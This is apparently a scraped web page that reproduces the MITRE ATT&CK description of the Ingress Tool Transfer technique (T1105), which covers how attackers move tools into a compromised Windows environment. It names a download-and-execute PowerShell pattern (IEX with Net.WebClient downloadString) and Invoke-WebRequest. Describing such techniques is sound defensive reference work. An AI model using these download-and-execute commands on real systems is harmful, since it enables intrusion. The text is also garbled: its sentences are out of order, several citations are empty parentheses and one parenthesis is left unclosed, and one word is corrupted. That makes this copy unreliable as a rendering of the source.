On Windows, adversaries may use various utilities to download tools, such as copy, finger, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. ( )).įiles can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ( ).
T1105 - Ingress Tool Transfer Description from ATT&CK Adversaries may transfer tools or other files from an external system into a compromised environment.
0 kommentar(er)
